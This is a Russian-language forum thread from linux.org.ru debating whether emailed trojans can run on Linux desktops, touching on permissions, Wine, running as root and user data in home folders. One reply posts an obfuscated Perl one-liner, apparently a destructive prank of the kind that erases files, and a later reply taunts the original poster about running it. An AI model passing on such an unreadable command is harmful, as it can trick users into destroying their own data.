LINUX.ORG.RU
ФорумTalks

Trojan in linux


0

0

Вот спорят много по поводу, что линукс не такой и уж безопасный...
Вот хотя бы один момент - рассылка троянов(исполняемых файлов) по почте. В винде оно идёт полным ходом. А вот в линуксе как ни старайся, прислать по почте егзешнег(елья), можно, но он никогда не запустится, ну если уж сильно захотеть (к тому же ещё навык нужен).

Вот. Так. Так что по безопасности, хотябі из за этого линукс стоит ставить на десктопы. Лично я юзаю SUSE Linux.

Или я не прав?
Перемещено cavia_porcellus из Security

> Или я не прав?

Убунта на на подавляющем кол-ве десктопов. Это значит стандатное окружение. 

% ll /etc/alternatives/x-session-manager | grep "gnome" 
lrwxrwxrwx 1 root root 22 2009-06-03 19:37 /etc/alternatives/x-session-manager -> /usr/bin/gnome-session*

% ls ~/.config/autostart/
ktorrent.desktop  qstardict.desktop  tomboy.desktop

Дальше думай сам.

a3
()

Идеальной надёжности не бывает, но это действительно хорошая причина использовать линукс вместо виндос.

sin_a ★★★★★
()

>рассылка троянов(исполняемых файлов) по почте

виноват тот кто это запускает, проблема не в ОС , а в пользователе

> но он никогда не запустится


запустится, забываете про то что бинарники допустим linux x86 более менее одинаковы, для функций типичного трояна совместимости хватит,
Кроме того есть и скрипты (sh, perl, python)
другое дело что в системе это не генерализуется, а будет работать с правами пользователя, т.к. элевацию привилегий будет сделать непросто, но не невозможно


> хотябі из за этого линукс стоит ставить на десктопы


ставьте, можно подумать кто-то вам не дает этого делать.


Sylvia ★★★★★
()

Большинство проблем в голове. А именно под виндой принято работать под Админом, запускать все подряд, и что прислали по почте и что сами скачали с варезных сайтов, вирусам раздолье. Под Линуксом было принято работать под пользователем и ставить пакеты из дистрибутива. Правда это было, ИМХО, сейчас много народа сидит под рутом...

mky ★★★★★
()
Ответ на: комментарий от mky

To: Silvy, mky

Господа. Абы..., кабы..., ... это всё рассуждения

ФАКТ: юзеру пришло письмо с вложением, которое он по глупости своей или любопытству пытается открыть.

Вот про это я говорю. В линуксе, данную ситуацию нельзя повторить(ну или тяжело).

Мне никто, не мешает ставить. Я не жалуюсь. Я делюсь своими мыслями, на тот случай, а вдруг я заблуждаюсь.
>запустится, забываете про то что бинарники допустим linux x86 более менее одинаковы, для функций типичного трояна совместимости хватит

Silvy, ты это про что? Обоснуй! Ато я нипонил.


>% ll /etc/alternatives/x-session-manager | grep "gnome"

>lrwxrwxrwx 1 root root 22 2009-06-03 19:37 /etc/alternatives/x-session-manager -> /usr/bin/gnome-session*

>% ls ~/.config/autostart/

>ktorrent.desktop qstardict.desktop tomboy.desktop

А это кто-нибуть объяснит?

dimakolev
() автор топика
Ответ на: комментарий от dimakolev

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

если пользователь ССЗБ для него и вот такое станет достаточным

Sylvia ★★★★★
()
Ответ на: комментарий от dimakolev

> Вот про это я говорю. В линуксе, данную ситуацию нельзя повторить(ну или тяжело).

Ты толстоват и глуповат, наверное.

a3
()
Ответ на: комментарий от a3

Флудиш. Сообщние без смысла. Объясни, "худоватый и умноватый (наверное)". Да, много-го незнаю, ведь для того и форум, чтобы обмениваться знаниями (И явно не для того, чтобы такие умные как ты смеялись над другими).

dimakolev
() автор топика
Ответ на: комментарий от RaDiSt

"Глупость должна быть наказана!"

//Я моя тоже, если кто подумает о лицемерии.

На самой защищённой системе нельзя будет работать. Нельзя, пусть он в это просто поверит.

А как вы предлагаете обезопасить запуск каких-то скриптов, пришедших со спамом? Не дать прав на запись/удаление? SELinux/SMACK/RSBAC в зубы, если думать лениво. Да-да, оксюморон ^^.

wyldrodney
()
Ответ на: комментарий от mky

>ИМХО, сейчас много народа сидит под рутом...

Кстати, где вы таких сидящих под рутом находите? Я лично ни одного не видел

Кстати, чтоб запустить скрипт он должен обладать x-битом. Что-то не помню почтовиков передающих права вложенных файлов

DNA_Seq ★★☆☆☆
()
Ответ на: комментарий от DNA_Seq

Ну почему же... из вебпочты сохраняем, кликаем... Наутилус ведь может скрипты пускать? Я просто сразу переключил на открытие, потому не знаю.

wyldrodney
()
Ответ на: комментарий от RaDiSt

ну если он решил проверить это на себе - сочувствую, нельзя ж до такой степени то быть ссзб ) но зато на себе прочувствует всю концепцию своей темы )

Sylvia ★★★★★
()

Самая неприятная зараза, которую я видел на юниксовых серваках - это лядские корявые кривучие похапе-движки, которые _регулярно_ проламывают, через которые _регулярно_ спамят, или хуже того - превращают сервер в часть ботнета.

Komintern ★★★★★
()
Ответ на: комментарий от Ingwar

ну если считать Google хранилищем закладок, то да

Sylvia ★★★★★
()
Ответ на: комментарий от DNA_Seq

>Кстати, чтоб запустить скрипт он должен обладать x-битом. Что-то не помню почтовиков передающих права вложенных файлов

ну при желании можно передавать тар с правами для. почтовые вирусы часто распространяли архивы себя.

Ingwar ★★★★★
()

>прислать по почте егзешнег(елья), можно, но он никогда не запустится,

Рассказать автору про вайн или не стоит?

>Или я не прав?


Не прав.

>линукс стоит ставить на десктопы.


Пожалей человечество...

delilen ★☆
()
Ответ на: комментарий от mky

>сейчас много народа сидит под рутом...

Кто??? ГДЕ????

delilen ★☆
()
Ответ на: комментарий от dimakolev

>Да, много-го незнаю

"много-го" и я не знаю (Раздельно пишется, кстати). А вообще виндовые вирусы вполне неплохо чувствуют себя под линуксом. Потом слава человекам, есть привязка программ к типам файлов. И хула человекам есть человеки - гидроэнцифалы, которые тыкают и запускают все что под руку попадется...

ЗЫ: Для запуска приложений в вайне права рута не нужны.

delilen ★☆
()
Ответ на: комментарий от Komintern

>кривучие похапе-движки

Я всегда говорил, лучше добавить десяток гигов памяти и использовать энтерпрайзную Java.

redgremlin ★★★★★
()
Ответ на: комментарий от mky

>сейчас много народа сидит под рутом

O_o Да почти во всех дистрах уже или рута нет, или иксы под рутом не запустишь.

redgremlin ★★★★★
()
Ответ на: комментарий от keiner

толку от этого будет нуль. дальше пользователя такой экзешник, даже под вайном запущенный не выйдет далее чем папки юзверя.

это не вирус, это пакость обыкновенная.

MikeDM ★★★★★
()
Ответ на: комментарий от redgremlin

нет. на любом языке можно написать кривой и кишащий багами быдлокод. тут не в языке дело к сожалению. похапе просто под руку попался.

Komintern ★★★★★
()
Ответ на: комментарий от MikeDM

>толку от этого будет нуль. дальше пользователя такой экзешник, даже под вайном запущенный не выйдет далее чем папки юзверя.

>это не вирус, это пакость обыкновенная.

Лично мне похрен на все содержимое / кроме /home, а там такая дрянь спокойно все зашифрует/удалит да и спамить ей никто не мешает

keiner
()

ОП, я надеюсь, ты смог запустить предложенный выше однострочник?

gotf
()
Ответ на: комментарий от MikeDM

>не выйдет далее чем папки юзверя.

Как бы сказать, данные и прочее тоже лежат не за пределами папки юзера.. Смысл ковырять систему? Вот это пакость уже похуже.

delilen ★☆
()
Ответ на: комментарий от redgremlin

>>рута нет

Отключен != нету.

>>иксы под рутом не запустишь

Щито? X запускается от root, другое дело, что подключиться к нему root'ом не позволят эти ваши gdm/kdm.

gotf
()
Ответ на: комментарий от delilen

Именно! С каких пор ценность прикладного ПО стала превышать ценность уникальных пользовательских данных?

gotf
()
Ответ на: комментарий от gotf

А вот незачем хранить данные в "~/*". Ну, просто не стоит. Я был бы рад искоробочному запрету на узменение файлов всяким браузерам, IM, сторонними софтинами... Хотя для запуска "левого" в Федоре специальные контейнеры пилят, вполне может стать простым решением.

wyldrodney
()
Ответ на: комментарий от wyldrodney

>>А вот незачем хранить данные в "~/*"

Согласен. Пока обдумываю более рациональную структуру для размещения своего хлама :-).

>>Хотя для запуска "левого" в Федоре специальные контейнеры пилят

Виртуальные машины уже не в моде?

gotf
()
Ответ на: комментарий от gotf

Громоздкие. Чего-то не прёт ради одного бинарника вторую систему ставить. Chroot тоже не всегда выход.

wyldrodney
()
Ответ на: комментарий от wyldrodney

> А вот незачем хранить данные в "~/*". Ну, просто не стоит.

Толстеешь. А где еще данные юзеру хранить, как не у себя в домике?

> Я был бы рад искоробочному запрету на узменение файлов всяким браузерам, IM, сторонними софтинами...

А как тогда IM будут писать логи, настройки? Если привязать файлы к приложению - как тогда эти самые логи читать? А логи IM - это и есть порой те самые юзерские данные, которые и надо хранить и защищать.

simple_best_world_web_master
()
Ответ на: комментарий от simple_best_world_web_master

Изменение _сторонних_. Речь шла о каком-нибудь левом скрипте, способном попортить данные.

А хранить в /media/disk*, как сейчас обычно и выходит.

wyldrodney
()
Ответ на: комментарий от simple_best_world_web_master

То ты её установишь и у неё _уже_ будут права :) В теории, если следовать идее об большем разграничении прав.

wyldrodney
()
Ответ на: комментарий от simple_best_world_web_master

>>А где еще данные юзеру хранить, как не у себя в домике?

В домике пускай лежат .файлы и .каталоги, а данные лучше вынести отдельно. Да и музыкальные архивы, библиотеки и прочее подобное можно монтировать в r/o.

gotf
()
Ответ на: комментарий от redgremlin

>Да почти во всех дистрах уже или рута нет

Ага, поэтому на всех линуксовых форумах и дают советы как вернуть рута на законное место и заодно все знают, что SeLinux надо нафиг отключать, чтобы не мешал.

mky ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.